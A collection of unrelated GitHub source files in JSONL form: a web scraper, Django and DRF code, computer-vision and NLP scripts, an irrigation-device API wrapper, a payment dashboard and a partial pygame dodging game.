+{"seq_id":"19176919640","text":"from bs4 import BeautifulSoup\nimport requests\n\n\ndef main():\n    url = 'https://googleyasheck.com'\n\n    req = requests.get(url)\n    if req.status_code == requests.codes.ok:\n        html = req.text\n\n        soup = BeautifulSoup(html, 'html.parser')\n        for page in soup.find_all('article', 'post'):\n            href = page.h2.a['href']\n            title = page.h2.text.strip()\n            date = page.footer.time.text.strip()\n\n            print('{title} ({date}): {domain}{url}'.format(title=title, url=href, date=date, domain=url))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jwasham/practice-python","sub_path":"experiments/blog_posts.py","file_name":"blog_posts.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1548,"dataset":"github-code","pt":"48"}
+{"seq_id":"10813814545","text":"from django.db import transaction\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom wagtail.admin import messages\n\nimport requests\n\nfrom .models import Grid, Package\n\n\ndef process(url=\"https://djangopackages.org/api/v4/grids/?q=wagtail\"):\n    grid_data = requests.get(url).json()\n    for 
item in grid_data.get(\"results\", []):\n title = item.get(\"title\", \"\")\n if \"wagtail\" in title.lower():\n defaults = {key: item[key] for key in [\"title\", \"slug\", \"description\"]}\n grid, _ = Grid.objects.update_or_create(\n uid=item.get(\"id\"), defaults=defaults\n )\n for url in item.get(\"packages\", []):\n package_data = requests.get(url).json()\n defaults = {\n key: package_data[key]\n for key in [\n \"title\",\n \"slug\",\n \"repo_url\",\n \"pypi_version\",\n \"repo_forks\",\n \"repo_description\",\n \"pypi_url\",\n \"documentation_url\",\n \"repo_watchers\",\n \"participants\",\n ]\n if package_data[key] is not None\n }\n package, _ = Package.objects.update_or_create(\n uid=package_data.get(\"id\"), defaults=defaults\n )\n grid.packages.add(package)\n\n url = grid_data.get(\"next\")\n if url:\n process(url)\n\n\nclass IndexView(View):\n http_method_names = [\"get\", \"post\"]\n\n def post(self, request):\n with transaction.atomic():\n # Start fresh, remove all m2m's.\n [grid.packages.clear() for grid in Grid.objects.all()]\n process()\n messages.success(request, \"Success\")\n return self.get(request)\n\n def get(self, request):\n return render(\n request,\n \"packages/index.html\",\n {},\n )\n","repo_name":"wagtail/wagtail.org","sub_path":"wagtailio/packages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"48"} +{"seq_id":"14529169919","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 1 23:12:02 2016\n\n@author: Walatima\n\"\"\"\n\nimport os\nimport cv2\n\nclass ctakeimage():\n \n def takeimage():\n \n maxid = 0\n for file in os.listdir('dataSet'):\n #print(maxid)\n word = file.split('.')\n \n if(maxid < int(word[1])):\n maxid = int(word[1])\n print(maxid)\n \n #faceId = str(maxid + 1) #use an integer or something change this when getting a new face\n faceId = str(maxid+1)\n num=0 # just a count thing number\n cam = cv2.VideoCapture(0)\n detector=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n \n while(True):\n ret,img = cam.read()\n cv2.imshow('frame',img)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = detector.detectMultiScale(gray, 1.3, 5)\n print(\"1\")\n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n print(\"2\")\n num=num+1\n cv2.imwrite(\"dataSet/User.\"+faceId +'.'+ str(num) + \".jpg\", gray[y:y+h,x:x+w])\n print(\"3\")\n cv2.imshow('frame',img)\n \n if cv2.waitKey(200) & 0xFF == ord('q'):\n break\n elif (num>30): #taking 30 images for training purposes ;)\n cam.release()\n cv2.destroyAllWindows()\n break\n \n \nctakeimage.takeimage()\n'''def takefaces():\n with open('peopledata.csv','r', newline = '') as fp:\n print()\n for line in fp:\n word = line.split(',')\n if (word[0] == faceids):\n print(word)'''\n \n","repo_name":"ShahirAnsari/Facedetection_and_recognition","sub_path":"dataGen2.py","file_name":"dataGen2.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37254176942","text":"import os\nimport re\nimport sys\nimport spacy\nimport codecs\n\nlang = sys.argv[1]\ngt_dir = lang + '/clean/'\n\nlang_model = {'es':'es_core_news_sm', 'fr':'fr_core_news_sm', 'it':'it_core_news_sm', 'ru':'xx_ent_wiki_sm'}\nnlp = spacy.load(lang_model[lang]) \n\nif lang == 'ru':\n nlp.add_pipe(nlp.create_pipe('sentencizer'))\n\ndef sent_tokenize(sentences):\n splitted_and_tokenized = \"\"\n\n doc = 
nlp(sentences) \n    for sent in doc.sents:\n        splitted_and_tokenized += \" \".join(\n            [tok.text for tok in sent if not tok.text.isspace()]).strip() + '\\n'\n\n    splitted_and_tokenized = splitted_and_tokenized.strip()\n    return splitted_and_tokenized\n\nprint (\" ---------- TIMELINE TOKENIZE ----------\\n\")\nfor f in os.listdir(gt_dir):\n    sentences = \"\"\n    f_out = \"\"\n    filename = gt_dir + f\n    \n    with codecs.open(filename, \"r\", encoding=\"utf-8\", errors=\"ignore\") as fp:\n        for line in fp.readlines():\n            if line[0].isdigit() or line == '--------------------------------':\n                f_out += line\n            else:\n                tokenized = sent_tokenize(line)\n                f_out += tokenized + '\\n'\n    \n    with open(filename, 'w', encoding=\"utf-8\") as file:\n        file.write(f_out)\n","repo_name":"MorenoLaQuatra/multilingual_ts","sub_path":"timelines_preprocessing.py","file_name":"timelines_preprocessing.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"35572972664","text":"from rest_framework import generics, permissions, mixins, decorators, viewsets\n\n\nclass ActionPermissionMixin:\n    \"\"\"\n    Mixin that resolves permissions per action\n    \"\"\"\n    def get_permissions(self):\n        try:\n            return [permission() for permission in self.permission_classes_by_action[self.action]]\n        except KeyError:\n            return [permission() for permission in self.permission_classes]\n\n\nclass ActionSerializerMixin:\n    \"\"\"\n    Mixin that resolves serializers per action\n    \"\"\"\n    serializer_class_by_action = None\n\n    def get_serializer_class(self):\n        try:\n            return self.serializer_class_by_action[self.action]\n        except KeyError:\n            return self.serializer_class\n\n\nclass CreateRetrieveUpdateDestroy(mixins.CreateModelMixin,\n                                  mixins.RetrieveModelMixin,\n                                  mixins.UpdateModelMixin,\n                                  mixins.DestroyModelMixin,\n                                  ActionPermissionMixin,\n                                  viewsets.GenericViewSet):\n    \"\"\"\n    ViewSet with create, retrieve, update and destroy actions and per-action permissions\n    \"\"\"\n    pass\n","repo_name":"SkySock/artifact","sub_path":"src/base/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"1777095802","text":"from builtins import object, range\n\nimport numpy as np\nfrom copy import deepcopy\n\nfrom batchgenerators.augmentations.utils import create_zero_centered_coordinate_mesh, interpolate_img, rotate_coords_2d, \\\n    rotate_coords_3d, uncenter_coords\n\n\nclass InvertibleRotationGenerator(object):\n    \"\"\"\n    Enables rotation of batch data received from a generator object and the inverse rotation\n    Use-case: Use rotations in the prediction step and rotate back the results\n    Use like:\n    batch_gen = SomeBatchGenerator(SomeData)\n    inv_rot_batch_gen = InvertibleRotationGenerator(batch_gen)\n    batch_gen = inv_rot_batch_gen.generate()\n    batch, rotated_batch = next(batch_gen)\n    inverse_rotated_batch = inv_rot_batch_gen.invert(rotated_batch)\n    \"\"\"\n\n    def __init__(self, generator, angle_x=(0, 2 * np.pi), angle_y=(0, 2 * np.pi), angle_z=(0, 2 * np.pi),\n                 border_mode_data='nearest', border_cval_data=0, order_data=3,\n                 border_mode_seg='constant', border_cval_seg=0, order_seg=0, seed=42):\n\n        np.random.seed(seed)\n        self.generator = generator\n        self.params = {'ax': angle_x, 'ay': angle_y, 'az': angle_z,\n                       'bmode_data': border_mode_data, 'bmode_seg': border_mode_seg,\n                       'bcval_data': border_cval_data, 'bcval_seg': border_cval_seg,\n                       'order_data': order_data, 'order_seg': order_seg}\n\n        self.rand_params = {}\n\n    def rotate(self, data_dict):\n        data = data_dict[\"data\"]\n        
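# seg (the label map) is optional; when present it is resampled with the separate order_seg / bmode_seg settings so label values stay valid\n        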
do_seg = False\n        seg = None\n        if \"seg\" in list(data_dict.keys()):\n            seg = data_dict[\"seg\"]\n            do_seg = True\n        shape = np.array(data.shape[2:])\n        dim = len(shape)\n        for sample_id in range(data.shape[0]):\n            coords = create_zero_centered_coordinate_mesh(shape)\n\n            if dim == 3:\n                coords = rotate_coords_3d(coords,\n                                          self.rand_params['ax'][sample_id],\n                                          self.rand_params['ay'][sample_id],\n                                          self.rand_params['az'][sample_id])\n            else:\n                coords = rotate_coords_2d(coords, self.rand_params['ax'][sample_id])\n            coords = uncenter_coords(coords)\n            for channel_id in range(data.shape[1]):\n                data[sample_id, channel_id] = interpolate_img(data[sample_id, channel_id], coords,\n                                                              self.params['order_data'], self.params['bmode_data'],\n                                                              cval=self.params['bcval_data'])\n            if do_seg:\n                for channel_id in range(seg.shape[1]):\n                    seg[sample_id, channel_id] = interpolate_img(seg[sample_id, channel_id], coords,\n                                                                 self.params['order_seg'], self.params['bmode_seg'],\n                                                                 cval=self.params['bcval_seg'])\n\n        return {'data': data, 'seg': seg}\n\n    def generate(self):\n\n        for data_dict in self.generator:\n            assert \"data\" in list(\n                data_dict.keys()), \"your data generator needs to return a python dictionary with at least a 'data' key value pair\"\n\n            self.shape = np.array(data_dict[\"data\"].shape[2:])\n            self.dim = len(self.shape)\n\n            self.rand_params['ax'] = np.random.uniform(self.params['ax'][0], self.params['ax'][1], size=data_dict[\"data\"].shape[0])  # one random angle per sample in the batch\n            if self.dim == 3:\n                self.rand_params['ay'] = np.random.uniform(self.params['ay'][0], self.params['ay'][1],\n                                                           size=data_dict[\"data\"].shape[0])\n                self.rand_params['az'] = np.random.uniform(self.params['az'][0], self.params['az'][1],\n                                                           size=data_dict[\"data\"].shape[0])\n\n            initial_data_dict = deepcopy(data_dict)\n            rotated_data_dict = self.rotate(data_dict)\n            yield initial_data_dict, rotated_data_dict\n\n    def invert(self, data_dict):\n\n        rotated_data_dict = deepcopy(data_dict)\n        self.rand_params['ax'] = -self.rand_params['ax']\n        if self.dim == 3:\n            self.rand_params['ay'] = -self.rand_params['ay']\n            self.rand_params['az'] = -self.rand_params['az']\n\n        return self.rotate(rotated_data_dict)\n","repo_name":"ORippler/MSD_2018","sub_path":"batchgenerators/generators/invertible_rotation_generator.py","file_name":"invertible_rotation_generator.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"}
+{"seq_id":"73851736787","text":"\"\"\" Same as m1e_communication but without comments, to focus on the code. 
\"\"\"\n\nimport tkinter\nfrom tkinter import ttk\n\nimport old_mqtt_for_csse120 as communicator\n\n\ndef main(who_am_i):\n game = Game(who_am_i)\n game.start()\n\n\nclass Game(object):\n def __init__(self, who_am_i):\n self.gui = GUI(self)\n canvas = self.gui.canvas\n receiver = communicator.Receiver(self)\n self.sender = communicator.Sender(receiver, \"something_unique\",\n who_am_i)\n if who_am_i == 1:\n color = \"blue\"\n else:\n color = \"red\"\n self.ball = Ball(color, canvas)\n\n def start(self):\n self.gui.start()\n\n def act_on_message_received(self, message):\n message_parts = message.split()\n x = int(message_parts[0])\n y = int(message_parts[1])\n self.ball.move_to(x, y)\n\n def send_xy(self, x, y):\n self.sender.send_message(\"{} {}\".format(x, y))\n\n\nclass GUI(object):\n def __init__(self, game):\n self.game = game\n self.root = tkinter.Tk()\n self.frame = ttk.Frame(self.root, padding=10)\n self.frame.grid()\n self.canvas = self.make_canvas()\n self.make_chooser_for_xy()\n\n def make_canvas(self):\n canvas_width = 400\n canvas_height = 300\n canvas = tkinter.Canvas(self.frame, width=canvas_width,\n height=canvas_height)\n canvas.width = canvas_width\n canvas.height = canvas_height\n canvas.grid()\n return canvas\n\n def make_chooser_for_xy(self):\n entry_for_x = ttk.Entry(self.frame)\n entry_for_y = ttk.Entry(self.frame)\n send_button = ttk.Button(self.frame, text=\"Send X and Y\")\n send_button[\"command\"] = lambda: self.send_xy(entry_for_x, entry_for_y)\n entry_for_x.grid()\n entry_for_y.grid()\n send_button.grid()\n\n def send_xy(self, entry_for_x, entry_for_y):\n x = int(entry_for_x.get())\n y = int(entry_for_y.get())\n self.game.send_xy(x, y)\n\n def start(self):\n self.root.mainloop()\n\n\nclass Ball(object):\n def __init__(self, color, canvas):\n self.canvas = canvas\n x = 200\n y = 200\n self.diameter = 20\n self.id = self.canvas.create_oval(x, y,\n x + self.diameter, y + self.diameter,\n fill=color)\n\n def move_to(self, x, y):\n self.canvas.coords(self.id, x, y, x + self.diameter, y + self.diameter)\n","repo_name":"RHIT-CSSE/csse120-public","sub_path":"PythonProjects-Archived/23-OldTkinterAnimation/src_legacy/m1e_communication_without_comments.py","file_name":"m1e_communication_without_comments.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17744849862","text":"import os\nimport shutil\n\ndef remove_colmap(basedir):\n remove_list = ['database.db', 'colmap_output.txt', 'poses_bounds.npy', 'sparse']\n\n for idx in remove_list:\n file_path = os.path.join(basedir, idx)\n if os.path.isdir(file_path) and not os.path.islink(file_path):\n print(f'removing {file_path}')\n shutil.rmtree(file_path)\n elif os.path.exists(file_path):\n print(f'removing {file_path}')\n os.remove(file_path)\n\n\nif __name__ == \"__main__\":\n print('REMOVE COLMAP Files')\n basedir = '/home/brozserver3/brozdisk/data/nerf/colmap_test_data/llff/fern'\n remove_colmap(basedir)\n \n\n","repo_name":"nuggy875/NeRF_pytorch_paeng","sub_path":"dataset/colmap/rmtest.py","file_name":"rmtest.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"31554863322","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\nif __name__ == '__main__':\n fig, axs = plt.subplots(3, 1, sharex=True)\n\n for ax, label in zip(axs, ('k1a4', 'k2a2', 'k1a6')):\n\n df = pd.read_csv(\n 
'./data/{}.csv'.format(label),\n header=2, names=['t', 'U'],\n )\n\n df['t'] = (df['t'] - df['t'].min()) * 1e6\n ax.plot('t', 'U', data=df, label=label)\n ax.set_ylabel(r'$U \\mathbin{/} \\si{\\volt}$')\n ax.legend(loc='upper left')\n\n axs[2].set_xlabel(r'$t \\mathbin{/} \\si{\\micro\\second}$')\n axs[2].set_xlim(0, 5)\n\n fig.tight_layout(pad=0, h_pad=0.5)\n fig.savefig('build/unknown.pdf')\n","repo_name":"maxnoe/tudo_masterfp","sub_path":"v52_leitungen/scripts/plot_unknown.py","file_name":"plot_unknown.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41064596904","text":"from .base_device import BaseDevice\nimport uuid\n\n\nclass SmartIrrigationControl(BaseDevice):\n def __init__(self, location, device_map):\n \"\"\"Constructor for the smart irrigation control device.\"\"\"\n BaseDevice.__init__(self, location, device_map[\"COMMON\"][0][\"id\"])\n self.type = \"SMART_IRRIGATION_CONTROL\"\n self.valve_set_id = \"N/A\"\n self.valve_set_state = \"N/A\"\n self.valve_set_last_error_code = \"N/A\"\n self.valves = {}\n self.setup_values_from_device_map(device_map)\n\n def _set_valves_map_value(\n self, target_map, source_map, value_name_in_source, value_name_in_target=None\n ):\n if not value_name_in_target:\n value_name_in_target = value_name_in_source\n if value_name_in_source in source_map:\n target_map[value_name_in_target] = source_map[value_name_in_source][\"value\"]\n else:\n target_map[value_name_in_target] = \"N/A\"\n\n def update_device_specific_data(self, device_map):\n if device_map[\"type\"] == \"VALVE_SET\":\n # SmartIrrigationControl has only one item\n self.valve_set_id = device_map[\"id\"]\n self.set_attribute_value(\"valve_set_state\", device_map, \"state\")\n self.set_attribute_value(\n \"valve_set_last_error_code\", device_map, \"lastErrorCode\"\n )\n if device_map[\"type\"] == \"VALVE\":\n self.valves[device_map[\"id\"]] = {\"id\": device_map[\"id\"]}\n self._set_valves_map_value(\n self.valves[device_map[\"id\"]], device_map[\"attributes\"], \"activity\"\n )\n self._set_valves_map_value(\n self.valves[device_map[\"id\"]],\n device_map[\"attributes\"],\n \"lastErrorCode\",\n \"last_error_code\",\n )\n self._set_valves_map_value(\n self.valves[device_map[\"id\"]], device_map[\"attributes\"], \"name\"\n )\n self._set_valves_map_value(\n self.valves[device_map[\"id\"]], device_map[\"attributes\"], \"state\"\n )\n\n async def start_seconds_to_override(self, duration, valve_id):\n data = {\n \"id\": str(uuid.uuid1()),\n \"type\": \"VALVE_CONTROL\",\n \"attributes\": {\"command\": \"START_SECONDS_TO_OVERRIDE\", \"seconds\": duration},\n }\n await self.location.smart_system.call_smart_system_service(valve_id, data)\n\n async def stop_until_next_task(self, valve_id):\n data = {\n \"id\": str(uuid.uuid1()),\n \"type\": \"VALVE_CONTROL\",\n \"attributes\": {\"command\": \"STOP_UNTIL_NEXT_TASK\"},\n }\n await self.location.smart_system.call_smart_system_service(valve_id, data)\n\n async def pause(self, valve_id):\n data = {\n \"id\": str(uuid.uuid1()),\n \"type\": \"VALVE_CONTROL\",\n \"attributes\": {\"command\": \"PAUSE\"},\n }\n await self.location.smart_system.call_smart_system_service(valve_id, data)\n\n async def unpause(self, valve_id):\n data = {\n \"id\": str(uuid.uuid1()),\n \"type\": \"VALVE_CONTROL\",\n \"attributes\": {\"command\": \"UNPAUSE\"},\n }\n await self.location.smart_system.call_smart_system_service(valve_id, 
data)\n","repo_name":"py-smart-gardena/py-smart-gardena","sub_path":"src/gardena/devices/smart_irrigation_control.py","file_name":"smart_irrigation_control.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"14507800703","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\nfrom .forms import SendMoneyForm, RequestMoneyForm\nfrom register.models import Transaction, User, Request\nfrom rest_framework import status\nimport requests\nfrom currency_conversion.views import CONVERSION_RATES\nfrom currency_conversion.views import get_converted_amount\nfrom django.contrib import messages\nfrom decimal import Decimal\n\nCONVERSION_API_URL = 'http://127.0.0.1:8000/conversion/'\n\n\ndef reset_and_add_balance_to_all_users(base_amount=1000, base_currency='GBP'):\n users = User.objects.filter(is_active=True)\n print(f'{users.count()} active users found')\n\n for user in users:\n print(f'Updating balance for user {user.username}')\n user.balance = 0\n\n if user.currency == base_currency:\n user.balance += base_amount\n else:\n conversion_rate = get_conversion_rate(base_currency, user.currency)\n converted_amount = base_amount * conversion_rate\n user.balance += converted_amount\n print(f'New balance for user {user.username}: {user.balance}')\n user.save()\n\n\n\"\"\"\ndef get_balance(user):\n balance = Decimal('0')\n sent_transactions = user.transactions.all()\n received_transactions = user.received_transactions.all()\n transactions = sent_transactions | received_transactions\n\n print(f'Calculating balance for user {user.username}:') # Debugging: Start of balance calculation\n print(f'Sent transactions count: {sent_transactions.count()}') # Debugging: Sent transactions count\n print(f'Received transactions count: {received_transactions.count()}') # Debugging: Received transactions count\n\n for transaction in transactions:\n if transaction.user == user:\n balance -= transaction.amount\n print(f'Sent transaction: {transaction.amount}, Updated balance: {balance}') # Debugging: Sent transaction and updated balance\n else:\n conversion_rate = get_conversion_rate(transaction.currency, user.currency)\n balance += transaction.amount * conversion_rate\n print(f'Received transaction: {transaction.amount}, Updated balance: {balance}') # Debugging: Received transaction and updated balance\n\n user.balance = balance\n user.save()\n\n print(f'Final balance for user {user.username}: {balance}') # Debugging: Final balance after calculation\n\n return balance\n\n\"\"\"\n\n\ndef make_payment(sender, recipient, amount, currency):\n if not isinstance(sender, User):\n raise ValueError('Sender must be a User object')\n if not isinstance(recipient, User):\n raise ValueError('Recipient must be a User object')\n if not isinstance(amount, (int, float)) or amount <= 0:\n raise ValueError('Amount must be a positive number')\n if not isinstance(currency, str) or len(currency) != 3:\n raise ValueError('Currency must be a 3-letter string code')\n\n sender_currency = sender.currency\n conversion_rates = CONVERSION_RATES.get(sender_currency, {})\n\n converted_amount = get_converted_amount(amount, currency, recipient.currency)\n\n print(f\"Sender initial balance: {sender.balance}\") # Debugging: Print sender's initial balance\n if sender.balance < Decimal(amount): # Convert amount to Decimal\n raise ValueError('Insufficient funds')\n 
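# debit the sender in their own currency, then credit the recipient with the converted amount; Decimal casts avoid float rounding drift\n    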
sender.balance -= Decimal(amount) # Convert amount to Decimal\n sender.save()\n print(f\"Sender updated balance: {sender.balance}\") # Debugging: Print sender's updated balance\n\n print(f\"Recipient initial balance: {recipient.balance}\") # Debugging: Print recipient's initial balance\n recipient.balance += Decimal(converted_amount) # Convert converted_amount to Decimal\n recipient.save()\n print(f\"Recipient updated balance: {recipient.balance}\") # Debugging: Print recipient's updated balance\n\n transaction = Transaction(user=sender, recipient=recipient, amount=Decimal(amount), currency=currency) # Convert amount to Decimal\n transaction.save()\n\n\ndef get_conversion_rate(currency1='USD', currency2='EUR', amount_of_currency1='1'):\n allowed_currencies = ['USD', 'EUR', 'GBP']\n if currency1 not in allowed_currencies or currency2 not in allowed_currencies:\n raise ValueError('Invalid currency')\n url = f'{CONVERSION_API_URL}{currency1}/{currency2}/{amount_of_currency1}'\n response = requests.get(url)\n if response.status_code == status.HTTP_200_OK:\n try:\n data = response.json()\n return data['conversion_rate']\n except (ValueError, KeyError) as e:\n print(f'Error decoding JSON response: {e}')\n else:\n print(f'Request failed with status code {response.status_code}: {response.content}')\n raise ValueError('Unable to get conversion rate')\n\n\ndef check_balance(request):\n balance = request.user.balance\n return render(request, 'check_balance.html', {'balance': balance})\n\n\ndef check_transactions(request):\n transactions = Transaction.objects.filter(user=request.user)\n return render(request, 'check_transactions.html', {'transactions': transactions})\n\n\ndef logout_view(request):\n logout(request)\n return redirect('login')\n\n\n@login_required\ndef dashboard(request):\n balance = request.user.balance\n print(f'User: {request.user.username}, Balance: {balance}') # Debugging: Print user's balance\n\n transactions = Transaction.objects.filter(user=request.user)\n\n send_money_form = SendMoneyForm()\n request_money_form = RequestMoneyForm()\n\n money_requests = Request.objects.filter(recipient=request.user)\n\n if request.method == 'POST':\n if 'send_money' in request.POST:\n send_money_form = SendMoneyForm(request.POST)\n if send_money_form.is_valid():\n sender = request.user\n recipient_email = send_money_form.cleaned_data['recipient_email']\n recipient = User.objects.get(email=recipient_email)\n amount = send_money_form.cleaned_data['amount']\n currency = send_money_form.cleaned_data['currency']\n\n if amount <= 0:\n messages.error(request, 'Amount must be a positive number')\n else:\n make_payment(sender, recipient, amount, currency)\n print(\n f'Send Money: Sender: {sender}, Recipient: {recipient}, Amount: {amount}, Currency: {currency}') # Debugging: Print send money info\n return redirect('dashboard')\n\n elif 'request_money' in request.POST:\n request_money_form = RequestMoneyForm(request.POST)\n if request_money_form.is_valid():\n sender_email = request_money_form.cleaned_data['sender_email']\n sender = User.objects.get(email=sender_email)\n recipient = request.user\n amount = request_money_form.cleaned_data['amount']\n currency = request_money_form.cleaned_data['currency']\n message = 'Request for money transfer'\n new_request = Request(user=sender, recipient=recipient, amount=amount, currency=currency,\n message=message)\n new_request.save()\n print(\n f'Request Money: Sender: {sender}, Recipient: {recipient}, Amount: {amount}, Currency: {currency}') # Debugging: Print 
request money info\n                return redirect('dashboard')\n\n        elif 'approve_request' in request.POST or 'reject_request' in request.POST:\n            request_id = request.POST.get('request_id')\n            if request_id:\n                money_request = Request.objects.get(id=request_id, recipient=request.user)\n                if 'approve_request' in request.POST:\n                    sender_email = money_request.user.email\n                    sender = User.objects.get(email=sender_email)\n                    recipient = request.user\n                    amount = money_request.amount\n                    currency = money_request.currency\n                    make_payment(sender, recipient, amount, currency)\n                    money_request.status = 'completed'\n                    money_request.save()\n                    messages.success(request, 'Money request approved and transaction completed')\n                elif 'reject_request' in request.POST:\n                    money_request.status = 'rejected'\n                    money_request.save()\n                    messages.success(request, 'Money request rejected')\n            else:\n                messages.error(request, 'Invalid action')\n            return redirect('dashboard')\n\n    context = {\n        'balance': balance,\n        'transactions': transactions,\n        'send_money_form': send_money_form,\n        'request_money_form': request_money_form,\n        'money_requests': money_requests,\n    }\n    return render(request, 'user_dashboard.html', context)\n","repo_name":"Adikad10/webapps2024","sub_path":"payapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"124370622","text":"# Block Jam By Cass (and a few bits by Tad)\n\n# * Imports\nimport pygame, random, sys, time\n\n# * Quick Info:\n\n# * Notes with # ! are old code\n\n# * I have annotated almost all the code and cleaned up some of it. I commented out your old collision system and made my own jank-as-heck one, and I have added sprites, but I still need to figure out how to remove the enemy in the top left (also the resolution is now 1650x1200)\n# * The game over screen is incomplete and I am still working on it\n\n# * TODO LIST\n# TODO: make game over screen stay open till any key pressed then try again (At end game)\n# TODO: Fix random enemy in top right\n# TODO: Fix enemy not spawning in leftmost column\n# TODO: Make more skins for the game\n\n# * Classes # ? 
Does this need to be here?\n\n# * Sprites\nclass Player(pygame.sprite.Sprite):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.image = pygame.image.load('resources/player.png')\n\t\tself.rect = self.image.get_rect()\n\tdef update(self, x, y):\n\t\tself.rect.bottomleft = [x, y]\n \nclass Enemy(pygame.sprite.Sprite):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.image = pygame.image.load('resources/enemy.png')\n\t\tself.rect = self.image.get_rect()\n\tdef update(self, x, y):\n\t\tself.rect.bottomleft = [x, y]\n \n# * Pygame\npygame.init()\n\n# * Screen setup\nWIDTH = 1650\nHEIGHT = 1200\nicon = pygame.image.load('resources/icon.ico')\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n# backGround = pygame.image.load('resources/bg.png')\npygame.display.set_caption('Block Jam')\npygame.display.set_icon(icon)\npygame.mouse.set_visible(False)\n\n# * Colors\nBLUE = (0,0,255)\nRED = (255,0,0)\nGREEN = (0,255,0)\nWHITE = (255,255,255)\nBLACK = (0,0,0)\n\n# * Enemy data\nenemy_size = 50\ngridWidth = WIDTH//enemy_size # floor division keeps the column count an int for randint\nenemy_pos = [random.randint(1, gridWidth-1)*enemy_size, 0]\nenemy_list = [enemy_pos]\nenemy_group = pygame.sprite.Group()\nenemy = Enemy()\nenemy_group.add(enemy)\n\n# * Player data\nplayer_size = 50\nplayer_pos = [(WIDTH/2)-(player_size/2), HEIGHT-(player_size*2)]\nplayer_group = pygame.sprite.Group()\nplayer = Player()\nplayer_group.add(player) \nplayer.update(player_pos[0], player_pos[1])\n\n\n# * Some variables\nSPEED = 5\ngame_over = False\nend_game = False\nscore = 0\nclock = pygame.time.Clock()\nscoreFont = pygame.font.Font(\"resources/font.otf\", 64)\ngameOverFont = pygame.font.Font(\"resources/fontBold.otf\", 96)\n\n\n\n# * Level set\ndef set_level(score, SPEED):\n\tif score < 150:\n\t\tSPEED = 10\n\telif score < 300:\n\t\tSPEED = 15\n\telif score < 600:\n\t\tSPEED = 25\n\telif score < 1200:\n\t\tSPEED = 50\n\telif score < 2400:\n\t\tSPEED = 75\n\telif score < 4800:\n\t\tSPEED = 100\n\treturn SPEED\t\n\n\n# * Enemy functions\ndef drop_enemies(enemy_list):\n\tdelay = random.random()\n\tif len(enemy_list) < 30 and delay < 0.05:\n\t\tx_pos = random.randint(1, gridWidth-1)*enemy_size\n\t\ty_pos = 0\n\t\tenemy_list.append([x_pos, y_pos])\n\t\tenemy = Enemy()\n\t\tenemy_group.add(enemy)\n\n# ! def draw_enemies(enemy_list, enemy_pos):\n# ! \tfor enemy_pos in enemy_list:\n# ! \t\tpygame.draw.rect(screen, RED, (enemy_pos[0], enemy_pos[1], enemy_size, enemy_size))\n\t\t\n\ndef update_enemy_positions(enemy_list, score):\n\tfor idx, enemy_pos in enumerate(enemy_list):\n\t\tif enemy_pos[1] >= 0 and enemy_pos[1] < HEIGHT:\n\t\t\tenemy_pos[1] += SPEED\n\t\t\tenemy.update(enemy_pos[0], enemy_pos[1])\n\t\t\tenemy_group.draw(screen)\n\n\t\telse:\n\t\t\tenemy_list.pop(idx)\t\n\t\t\tscore += 1\n\treturn score\t\t\n\n# * Collision functions\ndef collision_check(enemy_list, player_pos):\n\tfor enemy_pos in enemy_list:\n\t\tif detect_collision(enemy_pos, player_pos):\n\t\t\treturn True\n\treturn False\n\ndef detect_collision(player_pos, enemy_pos):\n\tp_x = player_pos[0]\n\tp_y = player_pos[1]\n\n\te_x = enemy_pos[0]\n\te_y = enemy_pos[1]\n \n\tif (e_x == p_x) or (p_x == e_x):\n\t\tif (e_y == p_y+(2*player_size)) or (p_y+(2*player_size) == e_y) or (e_y == p_y+(1*player_size)) or (p_y+(1*player_size) == e_y):\n\t\t\treturn True\n\treturn False\n\n\t# ! if (e_x >= p_x and e_x < (p_x + player_size)) or (p_x >= e_x and p_x < (e_x + enemy_size)):\n\t# ! \tif (e_y >= p_y and e_y < (p_y + player_size)) or (p_y >= e_y and p_y < (e_y + enemy_size)):\n\t# ! \t\treturn True\n\t# ! \t\treturn False\t\n\n# * Game loop\nwhile not game_over:\n\n\t# * End game \n\tif end_game:\n\t\ttime.sleep(2.5)\n\t\tgame_over = True\n \n\t# * Exit with cross\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tsys.exit()\t\n\n\t\t# * Movement\n\t\tif event.type == pygame.KEYDOWN:\n\n\t\t\tx = 